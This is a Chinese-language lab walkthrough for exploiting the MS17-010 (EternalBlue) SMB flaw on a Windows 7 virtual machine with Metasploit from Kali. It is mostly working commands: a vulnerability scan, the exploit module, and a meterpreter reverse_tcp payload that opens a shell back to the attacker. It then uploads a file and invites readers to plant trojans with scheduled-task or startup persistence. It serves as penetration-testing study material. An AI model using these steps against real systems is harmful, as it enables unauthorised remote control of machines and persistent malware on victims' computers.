实验环境:
kali2018.2虚拟机及windows7sp1虚拟机,windosws7为靶机
win7的ip地址:192.168.0.101
kali的ip地址:192,。168.0.105
确保二者能够通信
接下来,查看kali的msf所需的数据库postgresql是否开启
active,说明OK,接下来开启msf
msfconsole
启动成功,并且没有数据库未开启的警告,说明postgresql开启并支持msf
接下来利用msf自带的漏洞库
search eternalblue
当然如果知道漏洞编号也可以直接search ms17_010
先使用第二个扫描模块,再使用第三个攻击模块
use auxiliary/scanner/smb/smb_ms17_010
set RHOST 192.168.0.101
这里的RHOST就是靶机的ip地址。
设置好这些之后我们运行一下扫描模块
检测结果显示靶机对MS17_010脆弱,可以放心大胆地搞它了。
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.101
set LHOST 192.168.0.105
set payload windows/x64/meterpreter/reverse_tcp
这里的LHOST为kali攻击者的地址,也就是后面反弹shell的目标
payload 一定要设置,不设置的话只能进入到对方c:\windows\system32目录下的cmd,不能进入meterpreter,也就没那么好玩了
最后,攻击
exploit
攻击成功,进入meterpreter
shell
输入shell进入对方的cmd
exit
退出shell进入meterpreter
这次我们就上传一个haha.txt吧
upload /root/Desktop/haha.txt c:/windows/system32/haha.txt
当然,读者也可以上传一些木马,并且设置时间任务,让其在特定时间自动运行,也可以将其放到windows7开机自启目录下,让其一开机就运行。这些就留给读者自己实践了。